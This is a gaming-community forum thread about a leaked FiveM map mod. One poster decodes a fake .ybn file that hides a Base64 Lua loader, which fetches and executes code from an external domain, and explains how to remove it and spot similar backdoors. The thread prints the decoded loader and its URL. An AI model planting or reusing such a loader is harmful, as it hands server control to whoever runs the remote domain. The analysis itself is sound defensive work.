Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
Backdoors Found: 0
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard
justscripts

MLO/YMAP LEGION SQUARE-V3

HEAT22

HEAT22

Silver Elite
Joined
Oct 20, 2022
Messages
33
Reaction score
8
Points
166
Location
United States
Trash. There's not even any ymap files. Do not waste your time, just a weak attempt to backdoor.
 
RutRow

RutRow

Silver Elite
Joined
May 29, 2025
Messages
57
Reaction score
9
Points
166
Location
Canada
Let's inspect the uploaded file to understand its structure.

file_path = "/mnt/data/hei_dt1_12_1.ybn"

with open(file_path, "rb") as f:
data = f.read()

# Check size and first bytes for clues
(len(data), data[:64])
Click to expand...

Interesting — the .ybn file is exactly 312 bytes long, and the first bytes read:
UGVyZm9ybUh0dHBSZXF1ZXN0KCJodHRwczovL2l0c3RpbWV0b3BhcnR5LmxvbC9m
Click to expand...
That’s Base64, which decodes to something starting with PerformHttpRequest("
Hidden link for visitors, to see Log in or register now.
....


This matches what the Lua script in main.lua does — it reads the first 312 bytes, decodes them from Base64, and executes the resulting Lua code.

This strongly suggests the file contains an obfuscated remote code execution script (pulling Lua from an external server).

Fully decode the Base64 payload so we can see the actual code it runs?​
import base64

# Decode the Base64 content
decoded_content = base64.b64decode(data).decode(errors="replace")
decoded_content[:1000] # show first 1000 characters just in case it's long
Click to expand...
Here’s the decoded Lua code contained inside hei_dt1_12_1.ybn:
PerformHttpRequest("htt p s://its time to party. lol/f.php?key=65 68lwP js5K4 c175aqCE", function (a, b)
if b != nil then
function c()
load(b)()
end
if pcall(c) then
else
end
end
end)
Click to expand...

What this does:​

  • It makes an HTTP request to:
ht tps://itst imet opar ty.lol/f.php?key=65 68lwPjs5K4 c175aqCE
Click to expand...
  • Whatever Lua code is returned from that URL gets loaded and executed.
  • It uses pcall to prevent crashing if execution fails.
This is a remote code loader — meaning whoever controls that domain can run any code on your server.

How to cleanse it

There are two main approaches:

1. Completely neutralize it (safe & simple)

If this resource doesn’t actually need that .ybn file (which is very likely, since it’s not a valid Rockstar file), you can:
  1. Delete /stream/hei_dt1_12_1.ybn.
  2. Edit main.lua to remove the whole thread:
  3. Restart your server and check if the MLO still loads.
If the map still works, you’re done — you removed the backdoor.

2. Replace the file with a “real” dummy YBN

If the script requires the file to exist (for loading), you can replace it with a harmless blank file:
  1. Create an empty text file and save it as hei_dt1_12_1.ybn.
  2. Place it in /stream/ to satisfy the resource loader.

Detecting other hidden backdoors

This isn’t an isolated trick. Many “mods” from leaks or shady sellers use:
  • Fake .ybn, .ytd, .ydd files containing Base64 text.
  • Lua scripts that PerformHttpRequest() to unknown servers.
 
You must log in or register to reply here.
Top